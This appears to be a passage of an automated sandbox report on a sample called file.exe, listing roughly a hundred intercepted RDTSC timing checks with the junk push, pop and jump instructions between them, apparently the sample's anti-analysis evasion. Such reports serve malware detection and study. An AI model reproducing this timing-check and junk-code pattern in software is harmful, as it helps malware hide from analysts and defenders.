Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C648FB second address: C6490A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6490A second address: C64938 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F927881D819h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64AA9 second address: C64AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64AAF second address: C64AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64AB3 second address: C64AC9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jnc 00007F9278BE2826h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64AC9 second address: C64ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C68F31 second address: C68F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C68F37 second address: C68F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F927881D806h 0x0000000d jmp 00007F927881D80Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C68F53 second address: C68F57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C69099 second address: C690CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F927881D819h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F927881D80Ch 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6951F second address: C69525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C696BB second address: C696BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C696BF second address: C696C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C69806 second address: C6980C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6980C second address: C6981A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6981A second address: C69820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C69820 second address: C69825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C69825 second address: C6982C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6982C second address: C69832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C69832 second address: C6985F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F927881D806h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jmp 00007F927881D814h 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop esi 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6B310 second address: C6B333 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F9278BE2839h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6B333 second address: C6B339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D7C0 second address: C6D7D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jo 00007F9278BE2826h 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6FE92 second address: C6FEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jns 00007F927881D80Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6FEA5 second address: C6FEBB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F9278BE2831h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C70461 second address: C70488 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F927881D806h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F927881D818h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C74838 second address: C7483D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7483D second address: C74854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F927881D811h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C74854 second address: C74858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C74B17 second address: C74B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C74B1B second address: C74B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C74B21 second address: C74B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C74CB0 second address: C74CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C74CB8 second address: C74CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C74F4F second address: C74F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C751CD second address: C751D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C751D1 second address: C751F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9278BE2826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9278BE2834h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C751F4 second address: C751F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7E012 second address: C7E018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7E018 second address: C7E023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7E023 second address: C7E039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F9278BE282Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7E039 second address: C7E05A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D812h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jc 00007F927881D837h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7E05A second address: C7E05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7E05E second address: C7E062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7E062 second address: C7E06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7E06F second address: C7E075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7BFA7 second address: C7BFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7C26A second address: C7C275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F927881D806h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7C275 second address: C7C27A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7C86E second address: C7C872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7C872 second address: C7C878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7C878 second address: C7C890 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D810h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7C890 second address: C7C8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jns 00007F9278BE2826h 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7C8A2 second address: C7C8A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7D49A second address: C7D4B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2837h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7D4B5 second address: C7D4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7D4BF second address: C7D4C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7D790 second address: C7D794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7D794 second address: C7D79A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7DA32 second address: C7DA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F927881D80Fh 0x00000009 jmp 00007F927881D813h 0x0000000e popad 0x0000000f jmp 00007F927881D817h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C86472 second address: C86476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8618F second address: C86197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C879C2 second address: C879C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D6D7 second address: C8D6DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8DE61 second address: C8DE6E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8DE6E second address: C8DE74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8DE74 second address: C8DE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9278BE2831h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F9278BE2828h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8DE99 second address: C8DEC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D816h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F927881D811h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E2E2 second address: C8E2F2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9278BE282Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E2F2 second address: C8E2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E421 second address: C8E42B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9278BE2832h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E568 second address: C8E56C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E56C second address: C8E574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E574 second address: C8E57D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C96B38 second address: C96B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9278BE2826h 0x0000000a popad 0x0000000b jmp 00007F9278BE2835h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C96817 second address: C9681B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C980ED second address: C980FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F9278BE2826h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C980FA second address: C98131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F927881D823h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop esi 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C98131 second address: C98138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C98138 second address: C98144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F927881D806h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C98144 second address: C98148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA7170 second address: CA717A instructions: 0x00000000 rdtsc 0x00000002 je 00007F927881D812h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA717A second address: CA7180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA6B10 second address: CA6B2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F927881D814h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA6C63 second address: CA6C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA6C67 second address: CA6C80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D813h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA6C80 second address: CA6CAB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9278BE2828h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F9278BE2839h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA6CAB second address: CA6CB5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F927881D806h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA6CB5 second address: CA6CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB1B63 second address: CB1B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB1B67 second address: CB1B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC1B64 second address: CC1B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F927881D806h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC0710 second address: CC0714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC0B84 second address: CC0B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC181D second address: CC1823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC1823 second address: CC182C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC182C second address: CC1834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD151D second address: CD1521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD1521 second address: CD152F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F9278BE2826h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD152F second address: CD1542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD1542 second address: CD1548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD8984 second address: CD8988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD883D second address: CD8842 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE62F3 second address: CE62F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE6193 second address: CE6198 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE8C44 second address: CE8C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F927881D815h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D01FFB second address: D01FFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D01FFF second address: D0200F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F927881D806h 0x00000010 rdtsc
